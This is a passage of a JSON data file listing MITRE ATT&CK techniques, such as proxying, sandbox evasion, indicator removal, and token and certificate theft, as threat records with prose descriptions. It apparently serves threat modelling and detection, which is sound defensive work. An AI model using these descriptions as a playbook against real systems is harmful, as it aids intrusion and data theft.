can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system\u2019s files.\nhttps://attack.mitre.org/techniques/T1087\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1090 - Proxy", - "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.\nhttps://attack.mitre.org/techniques/T1090\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1059 - Command and Scripting Interpreter", - "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)\nhttps://attack.mitre.org/techniques/T1059\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1482 - Domain Trust Discovery", - "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)\nhttps://attack.mitre.org/techniques/T1482\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1020 - Automated Exfiltration", - "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1020\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1070 - Indicator Removal", - "description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary\u2019s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.\nhttps://attack.mitre.org/techniques/T1070\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1609 - Container Administration Command", - "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)\nhttps://attack.mitre.org/techniques/T1609\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1083 - File and Directory Discovery", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)\nhttps://attack.mitre.org/techniques/T1083\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1568 - Dynamic Resolution", - "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)\nhttps://attack.mitre.org/techniques/T1568\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1647 - Plist File Modification", - "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application\u2019s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)\nhttps://attack.mitre.org/techniques/T1647\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1074 - Data Staged", - "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.\nhttps://attack.mitre.org/techniques/T1074\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1649 - Steal or Forge Authentication Certificates", - "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate\u2019s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate\u2019s subject alternative name (SAN) values define the certificate owner\u2019s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as \u201cgolden\u201d certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)\nhttps://attack.mitre.org/techniques/T1649\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1049 - System Network Connections Discovery", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A)\nhttps://attack.mitre.org/techniques/T1049\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1584 - Compromise Infrastructure", - "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus)\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)\nhttps://attack.mitre.org/techniques/T1584\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1542 - Pre-OS Boot", - "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.\nhttps://attack.mitre.org/techniques/T1542\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1612 - Build Image on Host", - "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.\nhttps://attack.mitre.org/techniques/T1612\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1586 - Compromise Accounts", - "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).\nhttps://attack.mitre.org/techniques/T1586\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1497 - Virtualization/Sandbox Evasion", - "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\nhttps://attack.mitre.org/techniques/T1497\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1102 - Web Service", - "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).\nhttps://attack.mitre.org/techniques/T1102\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1608 - Stage Capabilities", - "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)\n* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)\nhttps://attack.mitre.org/techniques/T1608\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1104 - Multi-Stage Channels", - "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.\nhttps://attack.mitre.org/techniques/T1104\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1480 - Execution Guardrails", - "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.\nhttps://attack.mitre.org/techniques/T1480\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1619 - Cloud Storage Object Discovery", - "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .\nhttps://attack.mitre.org/techniques/T1619\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1528 - Steal Application Access Token", - "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nIn Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container\u2019s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.\nhttps://attack.mitre.org/techniques/T1528\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1204 - User Execution", - "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)\nhttps://attack.mitre.org/techniques/T1204\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1057 - Process Discovery", - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)\nhttps://attack.mitre.org/techniques/T1057\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1072 - Software Deployment Tools", - "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.\nhttps://attack.mitre.org/techniques/T1072\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1041 - Exfiltration Over C2 Channel", - "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.\nhttps://attack.mitre.org/techniques/T1041\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1591 - Gather Victim Org Information", - "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1591\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1606 - Forge Web Credentials", - "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer 